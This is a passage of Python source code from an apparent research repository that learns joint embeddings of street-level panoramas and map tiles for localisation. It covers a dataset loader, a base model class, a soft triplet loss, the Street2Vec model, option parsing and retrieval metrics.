zooms = [18,19] if self.opt.isTrain else [self.opt.tile_zoom]
loc = self.area.get_location(index, zooms=zooms)
X, Y = [],[]
flip = (random.random() > 0.5) if self.opt.flips else False # It will be applied to both domains
rotation = 0.0 if self.opt.no_rotations else random.choice([0,-270,-180,-90]) # It will be applied to both domains
for _ in range(self.opt.num_augmentations):
# local rotation parameters
if not self.opt.no_local_rotation and not self.opt.no_rotations:
tile_rotation = random.choice([0,-270,-180,-90])
pano_rotation = random.uniform(-180,180) if self.opt.no_aligned else tile_rotation
else:
tile_rotation=rotation
pano_rotation=rotation
zoom = np.random.randint(18,20) if self.opt.isTrain else self.opt.tile_zoom
tile = loc.get_tile(zoom=zoom, rotation=tile_rotation, flip=flip)
if not self.opt.no_map_random_crop:
tile = random_crop(tile,size_final=self.opt.tile_size)
else:
if not (tile.shape[0] == self.opt.tile_size):
tile = cv2.resize(tile,(self.opt.tile_size,self.opt.tile_size))
tile = cv2.cvtColor(tile, cv2.COLOR_BGR2RGB)
tile = Image.fromarray(tile)
tile = get_transforms(self.opt.preprocess)(tile)
X.append(tile)
# Get panorama
if self.opt.panorama_mode == 'grid':
pano = [loc.get_snaps(size=self.opt.pano_size, mode='grid', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain)]
elif self.opt.panorama_mode == 'list':
pano = loc.get_snaps(size=self.opt.pano_size, mode='list', flip=flip, rotation=pano_rotation, noise=self.opt.isTrain) #[F,L,R,B]
elif self.opt.panorama_mode == 'pano':
yaw = rotation + np.random.normal(0,5) # A small random rotation
pitch = np.random.normal(0,5)
roll = np.random.normal(0,5)
pano = loc.get_pano(flip=flip, size=(self.opt.pano_size*2,self.opt.pano_size))
pano = [rotate_panorama(pano, roll, pitch, yaw)]
else:
raise Exception('Panorama mode {} not found'.format(self.opt.panorama_mode))
for img in pano:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
img = get_transforms(self.opt.preprocess)(img)
Y.append(img)
X = torch.stack(X, dim=0)
Y = torch.stack(Y, dim=0)
if self.opt.panorama_mode == 'list':
lista = torch.chunk(Y, self.opt.num_augmentations, dim=0)
Y = torch.stack(lista, dim=0)
sample = {'X':X, 'Y':Y}
sample['labels'] = torch.full((1, self.opt.num_augmentations), index)
sample['paths'] = str(index) + '.jpg'
sample['index'] = index
return sample
def show_dataset(self,examples=2):
for _ in range(examples):
index = np.random.randint(0,self.__len__())
sample = self.__getitem__(index)
print(sample['Y'].size())
if self.opt.panorama_mode == 'list':
snaps = torch.chunk(sample['Y'],4,dim=1)
pano = torch.cat(snaps, dim=4).squeeze()
else:
pano = sample['Y']
for i in range(self.opt.num_augmentations):
X = sample['X'][i]
Y = pano[i]
imA = tensor2im(X.view(1,X.size(0),X.size(1),X.size(2)))
imB = tensor2im(Y.view(1,Y.size(0),Y.size(1),Y.size(2)))
imA = cv2.cvtColor(imA, cv2.COLOR_RGB2BGR)
imB = cv2.cvtColor(imB, cv2.COLOR_RGB2BGR)
if imA.shape[0] != imB.shape[0]:
cv2.imshow("Tile", imA)
cv2.imshow("Panorama", imB)
else:
img = np.concatenate((imA, imB),axis=1)
cv2.imshow("Location", img)
cv2.waitKey(0)
def __len__(self):
"""Return the total number of images in the dataset."""
return self.area.N
```
#### File: Image-Map-Embeddings/models/base_model.py
```python
import os
import torch
import numpy as np
from collections import OrderedDict
from abc import ABC, abstractmethod
from .utils import get_scheduler
class BaseModel(ABC):
"""This class is an abstract base class (ABC) for models.
To create a subclass, you need to implement the following five functions:
-- <__init__>: initialize the class; first call BaseModel.__init__(self, opt).
-- <set_input>: unpack data from dataset and apply preprocessing.
-- <forward>: produce intermediate results.
-- <optimize_parameters>: calculate losses, gradients, and update network weights.
-- <modify_commandline_options>: (optionally) add model-specific options and set default options.
"""
def __init__(self, opt):
"""Initialize the BaseModel class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
When creating your custom class, you need to implement your own initialization.
In this function, you should first call <BaseModel.__init__(self, opt)>
Then, you need to define five lists:
-- self.loss_names (str list): specify the training losses that you want to plot and save.
-- self.model_names (str list): define networks used in our training.
-- self.visual_names (str list): specify the images that you want to display and save.
-- self.optimizer_names (str list): list names of optimizers to be saved in disk
-- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See cycle_gan_model.py for an example.
"""
self.opt = opt
self.gpu_ids = opt.gpu_ids
self.isTrain = opt.isTrain
self.device = torch.device('cuda:{}'.format(self.gpu_ids[0])) if self.gpu_ids else torch.device('cpu') # get device name: CPU or GPU
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name) # save all the checkpoints to save_dir
if opt.preprocess != 'scale_width': # with [scale_width], input images might have different sizes, which hurts the performance of cudnn.benchmark.
torch.backends.cudnn.benchmark = True
self.loss_names = []
self.model_names = []
self.visual_names = []
self.optimizer_names = []
self.optimizers = []
self.image_paths = []
self.metric = 0 # used for learning rate policy 'plateau'
self.metric_value = None # Best metric
self.total_iters = 0
self.epoch_iters = 0
# Set the seed
if opt.seed != -1:
np.random.seed(opt.seed)
#torch.set_deterministic(True)
torch.manual_seed(opt.seed)
torch.cuda.manual_seed(opt.seed)
torch.cuda.manual_seed_all(opt.seed) # if multi-GPU.
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
@staticmethod
def modify_commandline_options(parser, is_train):
"""Add new model-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
return parser
@abstractmethod
def set_input(self, input):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
input (dict): includes the data itself and its metadata information.
"""
pass
@abstractmethod
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
pass
@abstractmethod
def optimize_parameters(self):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
pass
def setup(self, opt):
"""Load and print networks; create schedulers
Parameters:
opt (Option class) -- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
if self.isTrain:
self.schedulers = [get_scheduler(optimizer, opt) for optimizer in self.optimizers]
if not self.isTrain or opt.continue_train:
load_suffix = 'iter_%d' % opt.load_iter if opt.load_iter > 0 else opt.epoch
self.load_networks(load_suffix)
self.print_networks(opt.verbose)
def eval(self):
"""Make models eval mode during test time"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.eval()
def train(self):
"""Make model trainable"""
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
net.train()
def test(self):
"""Forward function used in test time.
This function wraps <forward> function in no_grad() so we don't save intermediate steps for backprop
It also calls <compute_visuals> to produce additional visualization results
"""
with torch.no_grad():
self.forward()
self.compute_visuals()
def compute_visuals(self):
"""Calculate additional output images for visdom and HTML visualization"""
pass
def get_image_paths(self):
""" Return image paths that are used to load current data"""
return self.image_paths
def update_learning_rate(self):
"""Update learning rates for all the networks; called at the end of every epoch"""
for scheduler in self.schedulers:
if self.opt.lr_policy == 'plateau':
scheduler.step(self.metric)
else:
scheduler.step()
lr = self.optimizers[0].param_groups[0]['lr']
print('learning rate = %.7f' % lr)
def get_current_visuals(self):
"""Return visualization images. train.py will display these images with visdom, and save the images to a HTML"""
visual_ret = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
visual_ret[name] = getattr(self, name)
return visual_ret
def get_current_losses(self):
"""Return traning losses / errors. train.py will print out these errors on console, and save them to a file"""
errors_ret = OrderedDict()
for name in self.loss_names:
if isinstance(name, str):
errors_ret[name] = float(getattr(self, 'loss_' + name))
return errors_ret
def save_networks(self, prefix, epoch_count, epoch_iters=None, total_iters=None, metric_value=None):
"""Save all the networks and optimizers to the disk. It also saves the current iteration and optionally a performance metric.
Parameters:
prefix -- current epoch or any text prefix; used in the file name '%s_net_%s.pth' % (prefix, name)
epoch_count -- current epoch
epoch_iters -- count of current iterations in current epoch
total_iters -- total count of iterations
metric_value -- Metric value for current epoch (optional)
"""
# save networks
for name in self.model_names:
if isinstance(name, str):
save_filename = '%s_net_%s.pth' % (prefix, name)
save_path = os.path.join(self.save_dir, save_filename)
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
state_dict = net.module.state_dict()
else:
state_dict = net.state_dict()
ckpt = {'epoch_iters': epoch_iters,
'total_iters': total_iters,
'last_epoch': epoch_count,
'metric_value': metric_value,
'model_state_dict': state_dict,
}
                torch.save(ckpt, save_path)
# Save optimizers
for name in self.optimizer_names:
if isinstance(name, str):
save_filename = '%s_optimizer_%s.pth' % (prefix, name)
save_path = os.path.join(self.save_dir, save_filename)
optimizer = getattr(self, 'optimizer_' + name)
ckpt = {'epoch_iters': epoch_iters,
'total_iters': total_iters,
'last_epoch': epoch_count,
'metric_value': metric_value,
'optimizer_state_dict': optimizer.state_dict(),
}
                torch.save(ckpt, save_path)
def load_networks(self, prefix):
"""Load all the networks and optimizers (if training) from the disk. It also loads the current iteration and a performance metric.
Parameters:
prefix -- current epoch or any text prefix; used in the filename '%s_net_%s.pth' % (prefix, name)
"""
for name in self.model_names:
if isinstance(name, str):
load_filename = '%s_net_%s.pth' % (prefix, name)
load_path = os.path.join(self.save_dir, load_filename)
if os.path.isfile(load_path):
net = getattr(self, 'net' + name)
if isinstance(net, torch.nn.DataParallel):
net = net.module
# Load checkpoint
ckpt = torch.load(load_path, map_location=str(self.device))
epoch_count = ckpt['last_epoch']
self.opt.epoch_count = epoch_count if prefix == 'latest' else epoch_count + 1
self.epoch_iters = 0 #ckpt['epoch_iters']
self.total_iters = ckpt['total_iters']
if self.isTrain:
self.metric_value = ckpt['metric_value'] if self.opt.initial_metric_value is None else self.opt.initial_metric_value
else:
self.metric_value = ckpt['metric_value']
net.load_state_dict(ckpt['model_state_dict'])
print('loaded the model from %s, n_epoch: %s num_iters: %s' % (load_path,epoch_count,self.total_iters))
else:
print("Warning file {} not found".format(load_path))
# Load optimizers
if self.isTrain:
for name in self.optimizer_names:
if isinstance(name, str):
load_filename = '%s_optimizer_%s.pth' % (prefix, name)
load_path = os.path.join(self.save_dir, load_filename)
if os.path.isfile(load_path):
optimizer = getattr(self, 'optimizer_' + name)
# Load checkpoint
ckpt = torch.load(load_path, map_location=str(self.device))
optimizer.load_state_dict(ckpt['optimizer_state_dict'])
print('loaded the optimizer from %s' % load_path)
else:
print("Warning file {} not found".format(load_path))
def print_networks(self, verbose):
"""Print the total number of parameters in the network and (if verbose) network architecture
Parameters:
verbose (bool) -- if verbose: print the network architecture
"""
print('---------- Networks initialized -------------')
for name in self.model_names:
if isinstance(name, str):
net = getattr(self, 'net' + name)
num_params = 0
for param in net.parameters():
num_params += param.numel()
if verbose:
print(net)
print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))
print('-----------------------------------------------')
def set_requires_grad(self, nets, requires_grad=False):
"""Set requies_grad=Fasle for all the networks to avoid unnecessary computations
Parameters:
nets (network list) -- a list of networks
requires_grad (bool) -- whether the networks require gradients or not
"""
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
```
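For orientation, a purely illustrative skeleton of a `BaseModel` subclass wiring up the five members the docstring asks for. The network, loss and option fields here are invented for the example; the real models in this repository (such as `street2vec_model.py` below) are considerably richer:
```python
import torch
from models.base_model import BaseModel


class ToyModel(BaseModel):
    @staticmethod
    def modify_commandline_options(parser, is_train=True):
        return parser

    def __init__(self, opt):
        BaseModel.__init__(self, opt)
        self.loss_names = ['l1']                 # exposes self.loss_l1 to get_current_losses()
        self.model_names = ['G']                 # exposes self.netG to the save/load/print helpers
        self.visual_names = ['x', 'y_hat']
        self.netG = torch.nn.Linear(8, 8).to(self.device)
        if self.isTrain:
            self.optimizer_names = ['G']
            self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr)
            self.optimizers = [self.optimizer_G]

    def set_input(self, sample):
        self.x = sample['X'].to(self.device)
        self.y = sample['Y'].to(self.device)

    def forward(self):
        self.y_hat = self.netG(self.x)

    def optimize_parameters(self):
        self.forward()
        self.optimizer_G.zero_grad()
        self.loss_l1 = torch.nn.functional.l1_loss(self.y_hat, self.y)
        self.loss_l1.backward()
        self.optimizer_G.step()
```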
#### File: models/nets/softtriplet.py
```python
import torch
import torch.nn as nn
class softTriplet(nn.Module):
def __init__(self, alpha, squared, device):
super(softTriplet, self).__init__()
self.alpha = alpha
self.squared = squared
self.device = device
def _pairwise_distances(self, X,Y):
dot_product = torch.matmul(X,torch.t(Y))
X_norm = torch.norm(X,p=2, dim=1, keepdim=True)
Y_norm = torch.norm(Y,p=2, dim=1, keepdim=True)
# Compute the pairwise distance matrix as we have:
# ||a - b||^2 = ||a||^2 - 2 <a, b> + ||b||^2
# shape (batch_size, batch_size)
distances = torch.pow(X_norm,2) - 2.0 * dot_product + torch.pow(torch.t(Y_norm),2)
# Because of computation errors, some distances might be negative so we put everything >= 0.0
distances = torch.max(distances, torch.zeros_like(distances))
if not self.squared:
# Because the gradient of sqrt is infinite when distances == 0.0 (ex: on the diagonal)
# we need to add a small epsilon where distances == 0.0
mask = torch.eq(distances, 0.0).float()
distances = distances + mask * 1e-16
distances = torch.sqrt(distances)
# # Correct the epsilon added: set the distances on the mask to be exactly 0.0
distances = distances * (1.0 - mask)
return distances
def _get_same_label_mask(self, labels):
"""Return a 2D mask where mask[a, p] is True if a and p have same label.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
labels = labels.expand(labels.shape[0],labels.shape[0])
labels_equal = torch.eq(labels, labels.t())
return labels_equal
def _get_anchor_positive_triplet_mask(self, labels):
"""Return a 2D mask where mask[a, p] is True iff a and p are distinct and have same label.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
        indices_equal = torch.eye(labels.size()[0], device=self.device).byte() # uint8 masks are deprecated in newer PyTorch; .bool() is the forward-compatible choice
indices_not_equal = ~ indices_equal
labels_equal = self._get_same_label_mask(labels)
mask = indices_not_equal & labels_equal
return mask
def _get_anchor_negative_triplet_mask(self, labels):
"""Return a 2D mask where mask[a, n] is True iff a and n have distinct labels.
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
Returns:
mask: tf.bool `Tensor` with shape [batch_size, batch_size]
"""
# Check if labels[i] != labels[k]
# Uses broadcasting where the 1st argument has shape (1, batch_size) and the 2nd (batch_size, 1)
labels_equal = self._get_same_label_mask(labels)
mask = ~ labels_equal
return mask
def _get_X_Y_triplet_mask(self, labels):
"""Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid.
Triplet (Xi, Yj, Yk) is valid if:
labels[i] == labels[j] and labels[i] != labels[k]
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
"""
same_label_mask = self._get_same_label_mask(labels)
li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0)
lj_not_equal_lk = ~ li_equal_lj.permute(2,1,0)
valid_triplet_mask = li_equal_lj & lj_not_equal_lk
return valid_triplet_mask
def _get_triplet_mask(self, labels):
"""Return a 3D mask where mask[a, p, n] is True if the triplet (a, p, n) is valid.
Triplet (Xi, Xj, Xk) is valid if:
i != j != k
labels[i] == labels[j] and labels[i] != labels[k]
Args:
labels: tf.int32 `Tensor` with shape [batch_size]
"""
# Indices mask
i_not_equal_j = ~torch.eye(labels.size()[0], device=self.device).expand(labels.size()[0],labels.size()[0],labels.size()[0]).bool().permute(2,1,0)
# Labels mask
same_label_mask = self._get_same_label_mask(labels)
li_equal_lj = same_label_mask.expand(1,labels.size()[0], labels.size()[0]).permute(2,1,0)
lj_not_equal_lk = ~li_equal_lj.permute(2,1,0)
valid_triplet_mask = (li_equal_lj & lj_not_equal_lk) & i_not_equal_j
return valid_triplet_mask
def batchall(self, X,labels,final_strategy):
pairwise_dist = self._pairwise_distances(X,X).expand(1,labels.size()[0],labels.size()[0])
        # Compute a tensor with all the possible triplets
anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1]
anchor_negative_dist = pairwise_dist.permute(1,0,2)
# triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k
triplet_loss_tensor = torch.log( 1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist)))
triplet_loss = torch.mul(triplet_loss_tensor, self._get_triplet_mask(labels).float())
# Count the number of valid triplets (where triplet loss> 0)
valid_triplets = torch.gt(triplet_loss,1e-16).sum()
# Get the final mean triplet loss over all valid triplets
if final_strategy == "mean":
loss = triplet_loss.sum() / (valid_triplets + 1e-16)
return loss
elif final_strategy is "mean_all":
loss = triplet_loss.mean()
return loss
elif final_strategy is "sum":
loss = triplet_loss.sum()
return loss
else:
print("Final strategy not found")
def batch_all_X_Y(self, X, Y, labels,final_strategy):
pairwise_dist = self._pairwise_distances(X,Y).expand(1, labels.size(0), labels.size(0))
        # Compute a tensor with all the possible triplets
anchor_positive_dist = pairwise_dist.permute(1,2,0) #[4,4,1]
anchor_negative_dist = pairwise_dist.permute(1,0,2)
# triplet_loss[i, j, k] will contain the triplet loss of anchor=i, positive=j, negative=k
triplet_loss_tensor = torch.log(1 + torch.exp( self.alpha * (anchor_positive_dist - anchor_negative_dist)))
triplet_loss = torch.mul(triplet_loss_tensor, self._get_X_Y_triplet_mask(labels).float())
# Count the number of valid triplets (where triplet loss> 0)
valid_triplets = torch.gt(triplet_loss,1e-16).sum()
# Get the final mean triplet loss over all valid triplets
if final_strategy == "mean":
loss = triplet_loss.sum() / (valid_triplets + 1e-16)
return loss
elif final_strategy is "mean_all":
loss = triplet_loss.mean()
return loss
elif final_strategy is "sum":
loss = triplet_loss.sum()
return loss
else:
print("Final strategy not found")
def batch_hard_X_Y(self, X, Y, labels):
pairwise_distances = self._pairwise_distances(X,Y)
# Valid anchor positives x-y have same label
anchor_positive_distance = torch.mul(pairwise_distances, self._get_same_label_mask(labels).float())
hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1)
# Valid anchor negatives x-y have different label
anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float())
max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True)
anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float()
hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True)
        triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() )))
return triplet_loss
def batch_hard(self, X, labels):
pairwise_distances = self._pairwise_distances(X,X)
# Valid anchor positives have same label and i != j
anchor_positive_distance = torch.mul(pairwise_distances, self._get_anchor_positive_triplet_mask(labels).float())
hardest_positive_distance, _ = torch.max(anchor_positive_distance, dim=1)
# Valid anchor negatives x-y have different label
anchor_negative_distance = torch.mul(pairwise_distances, 1.0 - self._get_anchor_negative_triplet_mask(labels).float())
max_anchor_negative_dist, _ = torch.max(pairwise_distances, dim=1, keepdim=True)
anchor_negative_dist = pairwise_distances + max_anchor_negative_dist * self._get_anchor_positive_triplet_mask(labels).float()
hardest_negative_distance, _ = torch.min(anchor_negative_dist, dim=1, keepdim=True)
triplet_loss = torch.log( 1 + torch.exp( self.alpha * ( (hardest_positive_distance - hardest_negative_distance).mean() )))
return triplet_loss
class SoftTripletLoss(softTriplet):
def __init__(self, cfg, device):
super(SoftTripletLoss, self).__init__(cfg.alpha, False, device)
self.cfg = cfg
self.device = device
def batch_all(self, X,Y,Labels, final_strategy):
l1 = super().batch_all_X_Y(X,Y,Labels,final_strategy)
l2 = super().batch_all_X_Y(Y,X,Labels,final_strategy)
l3 = super().batchall(X,Labels,final_strategy)
l4 = super().batchall(Y,Labels,final_strategy)
return l1, l2, l3, l4
def batch_hard(self, X,Y,Labels, final_strategy):
l1 = super().batch_hard_X_Y(X,Y,Labels)
l2 = super().batch_hard_X_Y(Y,X,Labels)
l3 = super().batch_hard(X,Labels)
l4 = super().batch_hard(Y,Labels)
return l1, l2, l3, l4
```
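A small self-contained sanity check for the loss above: it verifies the expansion used in `_pairwise_distances` against `torch.cdist` and runs one toy `batch_all` call. The `SimpleNamespace` stands in for the real options object and only carries the `alpha` field the class reads; the labels mimic four locations with two augmentations each:
```python
import torch
from types import SimpleNamespace
from models.nets.softtriplet import SoftTripletLoss

torch.manual_seed(0)
X = torch.randn(8, 16)                               # e.g. map-tile embeddings
Y = torch.randn(8, 16)                               # e.g. panorama embeddings
labels = torch.arange(4).repeat_interleave(2)        # 4 locations x 2 augmentations

criterion = SoftTripletLoss(SimpleNamespace(alpha=0.2), torch.device('cpu'))

# ||a - b||^2 = ||a||^2 - 2<a, b> + ||b||^2 should agree with torch.cdist up to float error
d_manual = criterion._pairwise_distances(X, Y)
print(torch.allclose(d_manual, torch.cdist(X, Y), atol=1e-4))   # expected: True

l1, l2, l3, l4 = criterion.batch_all(X, Y, labels, 'mean')
print(l1.item(), l2.item(), l3.item(), l4.item())
```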
#### File: Image-Map-Embeddings/models/street2vec_model.py
```python
import torch
import itertools
import torch.nn.functional as F
from .base_model import BaseModel
from .nets.street2vec_nets import define_netX, define_netY, define_netEMBX, define_netEMBY
from .nets.softtriplet import SoftTripletLoss
class Street2VecModel(BaseModel):
""" This class implements the network for embedding images and map tiles
It expect as input a dictionary with images from two domains X and Y.
"""
@staticmethod
def modify_commandline_options(parser, is_train=True):
"""Add new dataset-specific options, and rewrite default values for existing options.
Parameters:
parser -- original option parser
is_train (bool) -- whether training phase or test phase. You can use this flag to add training-specific or test-specific options.
Returns:
the modified parser.
"""
parser.add_argument('--embedding_dim', type=int, default=16, help='Dimension size in the embedding space')
parser.add_argument('--scale', type=int, default=32, help='Radius of the hypersphere')
parser.add_argument('--no_l2_norm', action='store_true', help='Disable l2-norm')
parser.add_argument('--alpha', type=float, default=0.2, help='For soft triplet loss')
if is_train:
parser.set_defaults(batch_size=15,n_epochs=30, n_epochs_decay=20, lr=0.00004)
parser.add_argument('--l1', type=float, default=1.0, help='Lambda 1 factor for loss function')
parser.add_argument('--l2', type=float, default=1.0, help='Lambda 2 factor for loss function')
parser.add_argument('--l3', type=float, default=1.0, help='Lambda 3 factor for loss function')
parser.add_argument('--l4', type=float, default=1.0, help='Lambda 4 factor for loss function')
else:
parser.set_defaults(batch_size=15, eval=True)
return parser
def __init__(self, opt):
"""Initialize the class.
Parameters:
opt (Option class)-- stores all the experiment flags; needs to be a subclass of BaseOptions
"""
BaseModel.__init__(self, opt)
if self.opt.isTrain and len(opt.domain) == 1:
            raise AssertionError('Street2vec model requires two domains, only {} was given'.format(opt.domain))
self.loss_names = ['l1', 'l2', 'l3', 'l4', 'soft']
self.visual_names = ['X','Yf','Yl','Yr','Yb'] if opt.panorama_mode == 'list' else ['X_thumbnail', 'Y_thumbnail']
# Define networks
self.model_names = ['X','Y', 'EMBX','EMBY']
self.netX = define_netX(opt)
self.netY = define_netY(opt)
self.netEMBX = define_netEMBX(opt)
self.netEMBY = define_netEMBY(opt)
if self.opt.isTrain:
parameters = []
for net_name in self.model_names:
net = getattr(self, 'net'+net_name)
parameters.append(net.parameters())
self.optimizer_names = ['O']
self.optimizer_O = torch.optim.Adam(itertools.chain(*parameters), lr=opt.lr, betas=(opt.beta1, 0.999))
self.optimizers = [self.optimizer_O]
self.criterion = SoftTripletLoss(self.opt, self.device)
def set_input(self, sample):
"""Unpack sample data from the dataloader and perform necessary pre-processing steps.
The data can be in either of the following formats
- when opt.panorama_mode is list ->
Parameters:
sample (dict): include the data itself and its metadata information.
"""
X = sample[self.opt.domain[0]].to(self.device)
Y = sample[self.opt.domain[1]].to(self.device)
self.X = X.view(-1, 3, X.size(3), X.size(4)) # X - > [batch_size, num_augmentations, num_channels, width, heigth]
if self.opt.panorama_mode == 'list':
# Y -> [batch_size, num_augmentations, snaps*, num_channels, width, heigth]
self.Yf = Y[:,:,0,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yl = Y[:,:,1,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yr = Y[:,:,2,:,:,:].view(-1,3,Y.size(4), Y.size(5))
self.Yb = Y[:,:,3,:,:,:].view(-1,3,Y.size(4), Y.size(5))
else:
# Y - > [batch_size, num_augmentations, num_channels, width, heigth]
self.Y = Y.view(-1, 3, Y.size(3), Y.size(4))
self.Y_thumbnail = F.interpolate(self.Y, size=128).detach() # For visualization
self.X_thumbnail = F.interpolate(self.X, size=128).detach() # For visualization
self.index = sample['index']
self.labels = sample['labels'].to(self.device).view(-1)
self.N = self.opt.batch_size*self.opt.num_augmentations
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
self.X_f = self.netX(self.X)
self.X_d = self.X_f.view(self.X_f.size(0),-1)
if self.opt.panorama_mode == 'list':
self.Y_flist = [self.netY(getattr(self, name)) for name in ['Yf','Yl','Yr','Yb']]
self.Y_dlist = [Y.view(Y.size(0),-1) for Y in self.Y_flist]
self.Y_d = torch.cat(self.Y_dlist,dim=1)
else:
self.Y_f = self.netY(self.Y)
self.Y_d = self.Y_f.view(self.Y_f.size(0),-1)
self.X_o = self.netEMBX(self.X_d)
self.Y_o = self.netEMBY(self.Y_d)
def backward(self):
"""Calculate loss"""
self.loss_l1, self.loss_l2, self.loss_l3, self.loss_l4 = self.criterion.batch_all(self.X_o, self.Y_o, self.labels, 'mean')
self.loss_soft = self.opt.l1 * self.loss_l1 + self.opt.l2 * self.loss_l2 + self.opt.l3 * self.loss_l3 + self.opt.l4 * self.loss_l4
self.loss_soft.backward()
def optimize_parameters(self):
self.forward()
self.optimizer_O.zero_grad()
self.backward()
self.optimizer_O.step()
def compute_visuals(self, writer, total_iters):
visuals = self.get_current_visuals()
images = []
vnames = ''
for key in visuals:
mean = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device)
std = torch.Tensor([0.5, 0.5, 0.5]).view(1,3,1,1).to(self.device)
v = visuals[key]*std + mean
images.append(v[0])
vnames += '-' + key
images = torch.stack(images,0)
writer.add_images(vnames, images, global_step=total_iters)
```
#### File: Image-Map-Embeddings/options/localize_options.py
```python
import argparse
import localizer
from .base_options import BaseOptions
class LocalizeOptions(BaseOptions):
"""This class includes test options.
It also includes shared options defined in BaseOptions.
"""
def initialize(self, parser):
parser = BaseOptions.initialize(self, parser)
parser.set_defaults(phase='localize')
parser.add_argument('--results_dir', type=str, default='./results/', help='saves results here.')
parser.add_argument('--steps', type=int, default = None, help='Number of steps')
parser.add_argument('--visualize', action='store_true', help='If set a figure displaying current state will be produced at each step')
        parser.add_argument('--nosave', action='store_true', help='If set, do not save experiment information')
self.isTrain = False
return parser
```
#### File: Image-Map-Embeddings/utils/metrics.py
```python
import numpy as np
from sklearn.metrics import pairwise_distances
import matplotlib.pyplot as plt
class NumpyMetrics():
def __init__(self, metric='euclidean'):
self.metric = metric
def rank(self, x,y, x_labels, y_labels):
distances = pairwise_distances(x,y,self.metric)
batch_size = x_labels.shape[0]
sorted_distances_indices = np.argsort(distances, axis=1)
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size))
retrived_labels = np.take(labels_matrix, sorted_distances_indices)
labels_equal = np.equal(np.expand_dims(y_labels,axis=1), retrived_labels)
rank = np.argmax(labels_equal.astype(float), axis=1) + 1
return rank
def elements_by_class(self, x_labels):
'''Count the total of elements of each class in the eval set
Return unique_labels -> A numpy array with the index of the labels
count -> Number of elements of each class in the test set
'''
unique_labels = np.unique(x_labels) # Make and array of unique labels
label_matrix = np.equal(np.expand_dims(unique_labels, axis=1), np.expand_dims(x_labels, axis=0)) #shape [No.classes,1],[1,Eval_size] -> [No_classes,Eval_size]
count = label_matrix.sum(axis=1)
return unique_labels,count
def true_positives(self, distances, x_labels, y_labels, k):
'''
        Find the k nearest y given x, then check whether the label of y corresponds to x, and accumulate.
'''
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
        tp = np.sum(labels_equal[:,0:k], axis=1) # Retrieved when it should be retrieved
return tp
def false_negative(self, distances, x_labels, y_labels, k):
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
fn = np.sum(labels_equal[:,k:], axis=1)
return fn
def false_positives(self, distances, x_labels, y_labels, k):
        'Retrieved items that should not have been retrieved'
sorted_distances_indices = np.argsort(distances,axis=1) #
batch_size = x_labels.shape[0]
labels_matrix = np.tile(x_labels, batch_size).reshape((batch_size, batch_size)) # True label matrix
retrieved_labels = np.take(labels_matrix,sorted_distances_indices) #The sorted retrieved labels matrix
labels_equal = np.equal(np.expand_dims(y_labels, axis=1), retrieved_labels) # Where the retrieved label == true label
labels_not_equal = np.logical_not(labels_equal)
fp = np.sum(labels_not_equal[:,0:k], axis=1)
return fp
def precision_at_k(self, x,y, x_labels, y_labels, k):
        ''' The ability of a classification model to identify only the relevant points.
        Precision = true_positives / (true_positives + false_positives) '''
distances = pairwise_distances(x,y,self.metric)
tp = self.true_positives(distances, x_labels, y_labels, k)
